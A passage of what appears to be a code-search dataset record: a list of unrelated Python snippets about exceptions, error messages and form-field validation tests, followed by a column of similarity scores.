self.form.make_fieldsets()\n\n self.form.fieldsets = original_fieldsets", "def test_that_field_required_validations_are_triggered_on_incorrect_attribute_setting(\n self,\n ):\n person = Person(first_name=\"Johnny\", last_name=\"John\")\n\n with pytest.raises(ValidationError) as error:\n person.first_name = \"\" # Simulate an error by force-resetting an attribute\n\n assert error.value.messages == {\"first_name\": [\"is required\"]}", "def __init__(self):\n self.message = \"Boundary too large, must be less than one degree of latitude and longitude.\"", "def __init__(self, *args, **kwds):\n if args or kwds:\n super(pixel_point0, self).__init__(*args, **kwds)\n #message fields cannot be None, assign default values for those that are\n if self.name is None:\n self.name = ''\n if self.red_u is None:\n self.red_u = []\n if self.red_v is None:\n self.red_v = []\n if self.yellow_u is None:\n self.yellow_u = []\n if self.yellow_v is None:\n self.yellow_v = []\n if self.green_u is None:\n self.green_u = []\n if self.green_v is None:\n self.green_v = []\n if self.purple_u is None:\n self.purple_u = []\n if self.purple_v is None:\n self.purple_v = []\n if self.orange_u is None:\n self.orange_u = []\n if self.orange_v is None:\n self.orange_v = []\n else:\n self.name = ''\n self.red_u = []\n self.red_v = []\n self.yellow_u = []\n self.yellow_v = []\n self.green_u = []\n self.green_v = []\n self.purple_u = []\n self.purple_v = []\n self.orange_u = []\n self.orange_v = []", "def required_field_fail(self, field, data):\n self.add_required_field_fail(field, data)\n self.update_required_field_fail(field, data)", "def test_raise_missing_flag_field(self):\n original_data = self.form.data\n original_fields = self.form.fields\n original_flag = self.form.USERNAME_FLAG_FIELD\n original_cleaned_data = getattr(self.form, 'cleaned_data', None)\n original_errors = getattr(self.form, 
'_errors', None)\n self.form.data = original_data.copy()\n self.form.fields = original_fields.copy()\n self.form.USERNAME_FLAG_FIELD = 'Not a valid field name'\n self.form.cleaned_data = {self.form.name_for_user: 'test_username', self.form.name_for_email: 'test_email'}\n # self.form._errors = ErrorDict() if original_errors is None else original_errors.copy()\n self.form._errors = None if original_errors is None else original_errors.copy()\n\n with self.assertRaises(ImproperlyConfigured):\n self.form.configure_username_confirmation()\n\n self.form.data = original_data\n self.form.fields = original_fields\n self.form.USERNAME_FLAG_FIELD = original_flag\n self.form.cleaned_data = original_cleaned_data\n self.form._errors = original_errors\n if original_cleaned_data is None:\n del self.form.cleaned_data\n if original_errors is None:\n del self.form._errors", "def get_missing_image(self):\n # This class should have a 'name' property so it mimics the Django file\n # field.\n return MissingProductImage()", "def __mandatory_is_not_given(self):\n\n strTestName = 'Mandatory parameter must be given (incorrect)'\n RxCSObject = _RxCSobject()\n\n RxCSObject.paramAddMan('mandatory_parameter', 'Mandatory parameter')\n\n self.__parametersCheck_error(RxCSObject, ParameterMissingError, strTestName)", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in LogicalConnector \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in LogicalConnector \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self):\n\n # dictionary that link all the invalid equation code to the\n # corresponding error massage\n self.ERROR_MASSAGE_DIC = {\n InvalidEquationCode.VALID: \"Valid\",\n InvalidEquationCode.UNDEFINED_CHARACTERS:\n \"Undefined characters in your equation\",\n InvalidEquationCode.CLOSE_WITHOUT_OPEN_BRACKET:\n \"Close bracket without open one\",\n InvalidEquationCode.EMPTY_EQUATION:\n \"Empty equation\",\n InvalidEquationCode.TOO_MANY_OPEN_BRACKET:\n \"Too many open brackets...(missing close brackets)\",\n InvalidEquationCode.OPERATORS_OPERANDS_ERROR:\n \"Missing operators/operands..\",\n InvalidEquationCode.TOO_MANY_DOTS:\n \"Too many dots in one number\",\n InvalidEquationCode.UNNECESSARY_BRACKET:\n \"Unnecessary brackets in your equation\",\n InvalidEquationCode.DIVISION_BY_ZERO:\n \"Division by zero is undefined\",\n InvalidEquationCode.FACTORIAL_ON_NEGATIVE_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.FACTORIAL_ON_DECIMAL_NUMBER:\n \"Factorial on negative number is illegal\",\n InvalidEquationCode.NUMBER_TOO_BIG: \"Number is too big\",\n InvalidEquationCode.COMPLEX_NUMBER: \"Complex number\",\n InvalidEquationCode.EMPTY_DECIMAL_POINT:\n \"Empty decimal point....(missing number)\",\n }", "def test_construct_values_raises_for_missing_fields(self):\n message = \"There must me one or more field names to compute a value. \"\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.construct_value_from_values()\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.construct_value_from_values('')\n with self.assertRaisesMessage(ImproperlyConfigured, message):\n self.form.construct_value_from_values([])", "def __init__(self, msg):\n super(F5CcclValidationError, self).__init__(msg)\n self.msg = 'Service configuration provided does not match schema: ' + \\\n msg", "def __init__(self, msg='hello'):\n print(\"post init ! 
height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg", "def error_message(self, error_field=None, **kwargs):\n\n if error_field:\n return \"Validation failed in Validator \\\"{}\\\" on field \\\"{}\\\"\".format(self.__class__.__name__, error_field)\n return \"Validation failed in Validator \\\"{}\\\"\".format(self.__class__.__name__)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['x'].required = True\n self.fields['y'].required = True\n self.fields['width'].required = True\n self.fields['height'].required = True\n self.fields['photo'].required = True", "def test_create_episode_missing_field(self, field_name):\n study_id, session_id = self.init_session()\n episode = sample_episode(study_id=study_id, session_id=session_id)\n episode.ClearField(field_name)\n with self.assertRaises(ValueError):\n self.storage.create_episode(episode)", "def initGUI(self):\n\n\t\t# Set window's title\n\t\tself.parent.title(\"Error Message\")\n\t\t# Creat frames that contain messages and buttons \n\t\tself.buttonFrame = Frame(self.parent)\n\t\tself.buttonFrame.pack(fill = BOTH, expand = True)\n\t\tmessageFrame = Frame(self.buttonFrame, borderwidth = 1)\n\t\tmessageFrame.pack(fill = BOTH, expand = True)\n\t\t# Creat buttons\n\t\tself.makeButtons()\n\t\t# Create and show an error message as an label\n\t\tvar = StringVar()\n\t\tlabel = Message(messageFrame, textvariable=var, relief=RAISED, width = 1000)\n\t\tvar.set(self.message)\n\t\tlabel.pack(fill = BOTH, expand = True)", "def test_invalid_add_post_form_with_image_missing(\n self, proto_post, proto_user\n ):\n\n data = {\n \"title\": \"This is the added title\",\n \"author\": proto_user,\n \"categories\": [21, 22],\n \"overview\": \"This is the added overview\",\n \"content\": \"This is the added content\",\n \"featured\": True,\n \"status\": 1,\n }\n form = PostForm(data)\n assert not form.is_valid()\n assert len(form.errors) == 1\n assert \"thumbnail\" in form.errors", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def create_error_box(self, message):\n messagebox.showerror(\"Error\", message)", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of 
ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def error(self, message=None, show_help=True):", "def set_error(errTxt):\r\n core.set_item_color(\"Start\", mvGuiCol_Button, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonActive, (255, 0, 0, 255))\r\n core.set_item_color(\"Start\", mvGuiCol_ButtonHovered, (255, 0, 0, 255))\r\n if not core.does_item_exist(\"Error##ErrorNoFACEITName\"):\r\n with simple.collapsing_header(\"Error##ErrorNoFACEITName\", parent=\"##GroupStats\",\r\n default_open=True,\r\n closable=False,\r\n bullet=True):\r\n core.add_text(\"ErrorText\", default_value=errTxt, color=(255, 0, 0, 255))", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def __init__(self, message=\"\"):\n super(AutomationError, self).__init__(message)", "def has_error(self, has_error):\n\n self._has_error = has_error", "def display_error(self, message):\n self.ui_widget.display_error(message=message)", "def test_error_with_empty_dataset_field(self):\n response = self.client.post(self.get_url(), {'object': ''})\n self.assertEqual(response.status_code, 200)\n self.assertFormError(response, 'form', 'object',\n 'This field is required.')", "def missing(self):\n return self.MISSING", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n MpiiPCKAccuracy(norm_item='invalid')", "def __init__(self, obj, path, notes=()):\n format_dict = {'attribute': path[-1], 'object_name': obj._name}\n message = (\"'{attribute}' has invalid value inside '{object_name}'\"\n .format(**format_dict))\n notes = [obj.help(path[-1], return_help=True)] + list(notes)\n super(PlotlyDictValueError, self).__init__(\n message=message, notes=notes, path=path\n )", "def add_error(self, err_msg):\n assert err_msg is not None, 'err_msg cannot be None'\n\n self.error_found = True\n self.error_message = err_msg.strip()", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self, message):\n ModelException.__init__(self, message)", "def __init__(self, message, text=None, reference=None, 
contact=None):\n self.openid_message = message\n self.reference = reference\n self.contact = contact\n assert type(message) not in [str, str]\n Exception.__init__(self, text)", "def raise_error(field: str, message: str, parent_error: Optional[Exception] = None) -> NoReturn:\n if parent_error is None:\n raise RowGenParseError(json, field, message)\n raise RowGenParseError(json, field, message) from parent_error", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def test_missing_mandatory(self):\n try:\n CollectorUpdate()\n self.assertFalse(\"RuntimeError expected\")\n except RuntimeError as exception:\n assert_that(str(exception), equal_to(\"Missing keys: 'stage', 'status', 'timestamp'\"))", "def __init__(self, message, fatal, error_num=None):\n Exception.__init__(self, message)\n self.fatal = fatal\n self.errno = error_num", "def error_message(self, error_message):\n\n self._error_message = error_message", "def post_init(self, msg='hello'):\n print(\"post init ! 
height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg", "def __init__(self, msg, path_to_item=None, valid_classes=None,\n key_type=None):\n self.path_to_item = path_to_item\n self.valid_classes = valid_classes\n self.key_type = key_type\n full_msg = msg\n if path_to_item:\n full_msg = \"%s at %s\" % (msg, render_path(path_to_item))\n super(ApiTypeError, self).__init__(full_msg)", "def test_construct_frame_tag_error(attributes, exception, error_msg):\n with pytest.raises(exception) as exc:\n Frame(**attributes)\n\n assert error_msg in str(exc)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def test_init(self):\n # test invalid normalized_items\n with self.assertRaisesRegex(\n KeyError, \"Should be one of 'bbox', 'head', 'torso'\"):\n JhmdbPCKAccuracy(norm_item='invalid')", "def add_error(self, msg):\n self._add_message(msg, self._errors)", "def __init__(self, parent, message, image_to_displayed=None):\r\n\r\n self.text_ = message\r\n path_dir = os.path.dirname(os.path.realpath(__file__))\r\n if image_to_displayed == \"warning\":\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/warning.png\")\r\n elif image_to_displayed == 'check':\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/check.png\")\r\n else:\r\n image_ = tkinter.PhotoImage(file=path_dir + \"/data/images/error.png\")\r\n\r\n self.image_ = image_\r\n BasicDialog.__init__(self, parent, title=None)", "def no_file_error(self: object) -> None:\n messagebox.showerror(\"No file selected\", \"Please select a file\")" ]
[ "0.56805265", "0.56665206", "0.5585767", "0.5569392", "0.5561353", "0.5527256", "0.55132455", "0.54539883", "0.5443838", "0.5439777", "0.54118824", "0.54014623", "0.54014623", "0.54014623", "0.53982174", "0.5364648", "0.5359602", "0.5337795", "0.5311328", "0.5287791", "0.5287027", "0.5273246", "0.52648157", "0.52509266", "0.52393657", "0.52363855", "0.52172285", "0.5211836", "0.52090544", "0.51861376", "0.5153515", "0.51496536", "0.5147504", "0.512138", "0.51171064", "0.50981647", "0.5090011", "0.5088339", "0.5078565", "0.5074387", "0.5074211", "0.5065158", "0.50585556", "0.5054672", "0.5050705", "0.5042692", "0.5039633", "0.50207496", "0.4998971", "0.49968985", "0.4996049", "0.49941036", "0.49920636", "0.49877673", "0.4976568", "0.49751836", "0.4968923", "0.4967454", "0.4967253", "0.4954628", "0.49511445", "0.49442118", "0.49437693", "0.49325335", "0.4927845", "0.49235225", "0.49129927", "0.49125895", "0.49103868", "0.4902155", "0.4899307", "0.48969752", "0.48951072", "0.48867282", "0.48773456", "0.48706892", "0.4864483", "0.48640206", "0.48616925", "0.48528078", "0.484531", "0.48423496", "0.4842097", "0.4840556", "0.48364744", "0.48325256", "0.48325256", "0.48325256", "0.48286778", "0.4825565", "0.4818391", "0.48178038", "0.4814484", "0.48125187", "0.48113757", "0.47947347", "0.4792107", "0.4788461", "0.47830364", "0.47818184", "0.47808093" ]
0.0
-1
Initializes FontNotFound with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadSystemFont(name, size):\n\n try:\n f = pygame.font.SysFont(name,size)\n except error, message:\n print \"Cannot load font: \", name\n raise SystemExit, message\n return f", "def loadDefaultFont(size):\n\n try:\n f = pygame.font.Font(None,size)\n except error, message:\n print \"Cannot load the default font\"\n raise SystemExit, message\n return f", "def FindOrCreateFont(*args, **kwargs):\n return _gdi_.FontList_FindOrCreateFont(*args, **kwargs)", "def __init__(self, *args, **kwargs):\n if kwargs.has_key('faceName'): kwargs['face'] = kwargs['faceName'];del kwargs['faceName']\n _gdi_.Font_swiginit(self,_gdi_.new_Font(*args, **kwargs))", "def initialize():\n #carga las fuente del usuario\n for family in USER_FONTS:\n for font in USER_FONTS[family]:\n name, path = USER_FONTS[family][font]\n pdfmetrics.registerFont(TTFont(name, path))", "def _instantiateFont(self, path):\n return self._fontClass(path,\n libClass=self._libClass,\n kerningClass=self._kerningClass,\n groupsClass=self._groupsClass,\n infoClass=self._infoClass,\n featuresClass=self._featuresClass,\n glyphClass=self._glyphClass,\n glyphContourClass=self._glyphContourClass,\n glyphPointClass=self._glyphPointClass,\n glyphComponentClass=self._glyphComponentClass,\n glyphAnchorClass=self._glyphAnchorClass)", "def __init__(self, *args, **kwargs):\n _gdi_.GraphicsFont_swiginit(self,_gdi_.new_GraphicsFont(*args, **kwargs))", "def load_font(fontname, fontsize):\n # system fonts\n if pygame.font.get_fonts().count(fontname) == 1:\n return pygame.font.SysFont(fontname, fontsize)\n # standard MS fonts\n if os.path.exists('/usr/share/fonts/truetype/msttcorefonts/'+fontname+'.ttf'):\n return pygame.font.Font('/usr/share/fonts/truetype/msttcorefonts/'+fontname+'.ttf', fontsize)\n # search /usr/share/fonts/\n for root, dirs, files in os.walk('/usr/share/fonts'):\n if fontname+'.ttf' in files:\n return pygame.font.Font(os.path.join(root, fontname+'.ttf'), fontsize)\n # search in working dir\n if os.exists('./'+fontname+'.ttf'):\n return pygame.font.Font(fontname+'.ttf', fontsize)\n # last resort: return default font\n return pygame.font.Font(None, fontsize)", "def __init__(self, message=\"\"):\n super(ElementNotFoundError, self).__init__(message)", "def loadCustomFont(path,name,size):\n\n fullname = os.path.join(path,name)\n f = pygame.font.Font(fullname,size)\n return f", "def defaultFont(self, p_int=None): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def load_font(fontSize):\n f1='/usr/share/fonts/corefonts/arialbd.ttf' \n f2='/usr/share/fonts/truetype/msttcorefonts/Arial_Bold.ttf'\n if os.path.isfile(f1): font=ImageFont.truetype(f1,fontSize)\n if os.path.isfile(f2): font=ImageFont.truetype(f2,fontSize)\n return font", "def selectfont(self, char):\n\n charcode = ord(char)\n for font in fontchecksequence:\n for fontrange in fontmapping[font]:\n if charcode in xrange(fontrange[0], fontrange[1]):\n return font\n return \"Helvetica\" # fallback, if no thirdparty font is installed", "def load_fonts(self):\n for key, font in enumerate(self.fonts):\n self.fonts[key]['font'] = load_font(font['name'], font['size'])\n checkpoint('fonts')", "def _create_font(cls, font, size):\n if font[-4:] in (\".ttf\", \".otf\"):\n return pygame.font.Font(font, size)\n else:\n return pygame.font.SysFont(font, size)", "def load_font(self, path: str, font_family: str, mode: str='n') -> None:\n font = PDFTrueTypeFont('F'+str(self.index), path)\n 
if not font_family in self.fonts:\n self.fonts[font_family] = {'n': font}\n self.fonts[font_family][mode] = font\n self.index += 1", "def _findExternalFontName(self, font): #copied from piddlePDF by cwl- hack away!\n\n piddle_font_map = {\n 'Times': 'Times',\n 'times': 'Times',\n 'Courier': 'Courier',\n 'courier': 'Courier',\n 'helvetica': 'Helvetica',\n 'Helvetica': 'Helvetica',\n 'symbol': 'Symbol',\n 'Symbol': 'Symbol',\n 'monospaced': 'Courier',\n 'serif': 'Times',\n 'sansserif': 'Helvetica',\n 'ZapfDingbats': 'ZapfDingbats',\n 'zapfdingbats': 'ZapfDingbats',\n 'arial': 'Helvetica'\n }\n\n try:\n face = piddle_font_map[font.facereqFace.lower()]\n except Exception:\n return 'Helvetica'\n\n name = face + '-'\n if font.bold and face in ['Courier', 'Helvetica', 'Times']:\n name = name + 'Bold'\n if font.italic and face in ['Courier', 'Helvetica']:\n name = name + 'Oblique'\n elif font.italic and face == 'Times':\n name = name + 'Italic'\n\n if name == 'Times-':\n name = name + 'Roman'\n # symbol and ZapfDingbats cannot be modified!\n\n #trim and return\n if name[-1] == '-':\n name = name[0:-1]\n return name", "def not_found_error(error):\n return render_template('errors/404.html'), 404", "def get_named_font(*a, **kw):\n return get_named_font(*a, **kw)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def SetNativeFontInfoFromString(*args, **kwargs):\n return _gdi_.Font_SetNativeFontInfoFromString(*args, **kwargs)", "def test_missing_glyph_list(tmpdir):\n path = \"%s/dummy/font.ufo\" % DATA_DIR\n out = str(tmpdir / basename(path)) + \".out\"\n\n with pytest.raises(ACFontError):\n psautohint([path, '-o', out, '-g', 'FOO,BAR'])", "def not_found(error):\n pass", "def set_font(self, font):\n\ttry:\n\t self.m_gdfont = self._fonts[font.lower()]\n\t self.m_font = font\n\texcept KeyError:\n\t raise ValueError, 'Illegal font name.'", "def create(font_name, point):\n return pygame.font.SysFont(font_name, int(point))", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def __init__(self, font='mediumbold'):\n\tself.set_font(font)", "def get_font_dict(f):\n return tk_font.Font(font=f).actual()", "def get_named_font(f, **kw):\n if _named_fonts_d.get(\"TkDefaultFont\") is None:\n for name in list(_named_fonts_d.keys()):\n _named_fonts_d[name] = tk_font.nametofont(name)\n #\n if f:\n fo = tk_font.Font(font=f)\n f_d = fo.actual()\n if kw:\n fo.config(**kw)\n f_d.update(**kw)\n for nf in _named_fonts_d:\n nf_d = tk_font.nametofont(nf).actual()\n if f_d == nf_d:\n return _named_fonts_d[nf]\n # didn't find it, so store created\n _named_fonts_d[str(fo)] = fo\n return fo\n return None", "def mistake_not_found():\n win6 = Toplevel(root)\n win6.title(\"Ошибка\")\n win6.geometry('270x40')\n lbl13 = Label(win6, text=\"Значение не найдено в базе данных!\", width=45, height=2)\n lbl13.place(x=-30, y=0)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def __init__(self, *args, **kwargs):\n _gdi_.DCFontChanger_swiginit(self,_gdi_.new_DCFontChanger(*args, **kwargs))", "def FromString(*args, **kwargs):\n return _gdi_.NativeFontInfo_FromString(*args, **kwargs)", "def SetFont(*args):\n return _gdi_.GraphicsContext_SetFont(*args)", "def setFontFallback(self,value):\n self.PDFreactorConfiguration.in1[\"fontFallback\"] = value", 
"def not_found(error):\n\n return render_template('errors/404.html'), 404", "def CreateFont(name, size):\r\n\ttry:\r\n\t\tf = pygame.font.Font(name, size)\r\n\t\treturn f\r\n\texcept IOError:\r\n\t\treturn pygame.font.SysFont(name, size)", "def setFontDirectory(self,location):\n self.PDFreactorConfiguration.in1[\"fontDirectory\"] = location", "def get_font_path(family, font_format=\"normal\"):\n weight = \"roman\"\n weight = None\n if font_format == \"bold\":\n font_format = \"normal\"\n weight = \"bold\"\n font = matplotlib.font_manager.FontProperties(\n family=family, style=font_format, weight=weight)\n file = matplotlib.font_manager.findfont(font)\n return file", "def FontFromNativeInfoString(*args, **kwargs):\n if kwargs.has_key('faceName'): kwargs['face'] = kwargs['faceName'];del kwargs['faceName']\n val = _gdi_.new_FontFromNativeInfoString(*args, **kwargs)\n return val", "def getFontPathOfFont(font, default=None):\n if hasattr(font, 'path'): # In case it is a Font instance, get its path.\n font = font.path\n if font is not None and not os.path.exists(font):\n font = getFontPaths().get(font)\n if font is None:\n font = default or getDefaultFontPath()\n return font", "def load_font(self, filename: str) -> None:\n try:\n from fontTools import ttLib\n except:\n raise ImportError(\n 'You need to install library fonttools to add new fonts: '\n 'pip install fonttools'\n )\n self.filename = str(Path(filename))\n self.font = ttLib.TTFont(self.filename)\n\n # TODO: cmap needs to be modifiedfor this to work\n self.cmap = self.font['cmap'].getcmap(3,1).cmap\n self.glyph_set = self.font.getGlyphSet()\n\n self.font_descriptor = self._get_font_descriptor()", "def set_font(self, font):\n\tself.m_font = font", "def create_font_data(self):\n font_data = FontImages()\n if not font_data.assert_data_correct():\n font_data.create_images()\n font_data.augment_data()", "def FFont(*args, **kwargs):\n if kwargs.has_key('faceName'): kwargs['face'] = kwargs['faceName'];del kwargs['faceName']\n val = _gdi_.new_FFont(*args, **kwargs)\n return val", "def __searchError(self, errorCode, errorString):\n self.__finish()\n E5MessageBox.warning(\n self,\n self.tr(\"Search PyPI\"),\n self.tr(\"\"\"<p>The package search failed.</p><p>Reason: {0}</p>\"\"\")\n .format(errorString))\n self.infoLabel.setText(self.tr(\"Error: {0}\").format(errorString))", "def setDislinFont(font='default'):\n fontdict[font]()", "def SetFont(*args, **kwargs):\n return _gdi_.DC_SetFont(*args, **kwargs)", "def addFont(self, source, family, bold, italic):\n fontArray = {\"source\":source,\"family\":family,\"bold\":bold,\"italic\":italic}\n if (self.PDFreactorConfiguration.in1[\"fonts\"] == None):\n self.PDFreactorConfiguration.in1[\"fonts\"] = []\n self.PDFreactorConfiguration.in1[\"fonts\"].append(fontArray)", "def add_error(self, err_msg):\n assert err_msg is not None, 'err_msg cannot be None'\n\n self.error_found = True\n self.error_message = err_msg.strip()", "def on_init_fail(self, event_time, message):\n pass", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def add_font(self, base: 'PDFBase') -> 'PDFObject':\n pass", "def place_error_message(self, message):\n msg = tk.Message(self.parent, text='Error: ' + message)\n msg.config(bg='white', font=('times', 18, 'bold'))\n msg.pack()", "def test_configs_font(\n self):\n root = Tk()\n custom = font.Font(root, family='Helvetica', size=12)\n self.assertEqual(custom.cget('family'), 'Helvetica')\n 
fontSelect.font_style(custom, 'Times')\n self.assertEqual(custom.cget('family'), 'Times')\n fontSelect.font_size(custom, 18)\n self.assertEqual(custom.cget('size'), 18)", "def named_font(self, point):\n return Font.create(self.name, point * self.scale)", "def _set_default_font(cls):\n if platform.system() == \"Linux\":\n for family in (\"DejaVu Sans\", \"Noto Sans\", \"Nimbus Sans\"):\n if family in tk.font.families():\n logger.debug(\"Setting default font to: '%s'\", family)\n tk.font.nametofont(\"TkDefaultFont\").configure(family=family)\n tk.font.nametofont(\"TkHeadingFont\").configure(family=family)\n tk.font.nametofont(\"TkMenuFont\").configure(family=family)\n break\n return tk.font.nametofont(\"TkDefaultFont\").configure()[\"family\"]", "def get_font_dict(*a, **kw):\n return get_font_dict(*a, **kw)", "def __init__(self, text, font, pos, color=(255, 255, 255)):\r\n self.pos = pos\r\n self.label = font.render(text, 1, color)", "def open_error_resource():\n need('Estr', 1, filename=\"errors.rsrc\", modname=__name__)", "def not_found(error):\n return f'{\"code\": 404, \"message\": \"Not found\"}', 404", "def resource_not_found(error_msg):\n return jsonify(error=str(error_msg))", "def FromUserString(*args, **kwargs):\n return _gdi_.NativeFontInfo_FromUserString(*args, **kwargs)", "def create_font(font_name, fit = True):\n font = {}\n try:\n numbers = Image.open(fonts_path + font_name + \".jpg\")\n if fit:\n numbers = images.fit_to_display(numbers, True)\n width, height = numbers.size\n font[\"d\"] = Image.open(fonts_path + \"degree.jpg\")\n font[\"d\"] = images.fit_to_display(font[\"d\"])\n font[\"p\"] = Image.open(fonts_path + \"percent.jpg\")\n font[\"p\"] = images.fit_to_display(font[\"p\"])\n font[\"m\"] = Image.open(fonts_path + \"am.jpg\")\n font[\"m\"] = images.fit_to_display(font[\"m\"], True)\n font[\"a\"] = Image.open(fonts_path + \"pm.jpg\")\n font[\"a\"] = images.fit_to_display(font[\"a\"], True)\n d_w, d_h = font[\"d\"].size\n font[\"d\"] = font[\"d\"].crop((10,0,d_w-10,d_w))\n box_width = float(width)/10 \n #Crop out each character in the provided image and save that to a dictionary\n for i in range(0, 10):\n box = [int(round(i*(box_width))), 0, int(round((i + 1)*(box_width))), height]\n #Checks if a subrectangle passes the width of the image, and shortens it if necessary\n if box[3] > width:\n box[3] = width\n \n box = tuple(box)\n font[str(i)] = numbers.crop(box) \n return font\n except IOError:\n print(\"Specified font file: %s.jpg cannot be found at: %s\" % (font_name,fonts_path))", "def __init__(self, err_code=None):\n self.err_code = err_code\n if self.err_code in [member.value for name, member in NrfjprogdllErr.__members__.items()]:\n err_str = 'An error was reported by NRFJPROG DLL: {} {}.'.format(self.err_code, NrfjprogdllErr(self.err_code).name)\n else:\n err_str = 'An error was reported by NRFJPROG DLL: {}.'.format(self.err_code)\n\n Exception.__init__(self, err_str)", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def not_found(e):\n return render_template(\"errors/404.html\"), 404", "def error_not_found(error):\n return 'No page here, dood. 
404!', 404", "def error(self, msg):\n with self._lock:\n self.wraptext(msg, fg=\"red\", bold=True)\n return self", "def not_found(error):\n return jsonify({\n \"success\": False,\n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404", "def set_font(self, font: str):\n self.font = font", "def not_found_msg(error):\n if request.path.startswith(\"/api\"):\n # Respond with JSON data with message and 404 code\n if isinstance(error, NotFound):\n message = str(error)\n else:\n message = f\"API endpoint {request.path!r} does not exist.\"\n response = jsonify({\"message\": message}), 404\n else:\n # Respond with 404 page\n message = error.message if isinstance(error, NotFound) else None\n response = render_template(\"not_found.html\", message=message), 404\n\n return response", "def page_not_found(error):\r\n return render_template('error_template.html' , title = \"404 bud\", \r\n \t\t\t\t\t\t\t\t\t\t\t\tmessage = \"Time to make the chimi-fuckin'-changas. \",\r\n \t\t\t\t\t\t\t\t\t\t\t\tsubline = \"404, not there\", \r\n \t\t\t\t\t\t\t\t\t\t\t\timage_location = url_for('static', filename = 'images/deadpool-funny.jpg') ), 404", "def test_check_familyname_matches_fontnames(self):\n contents = self.read_metadata_contents()\n fm = Metadata.get_family_metadata(contents)\n for font_metadata in fm.fonts:\n 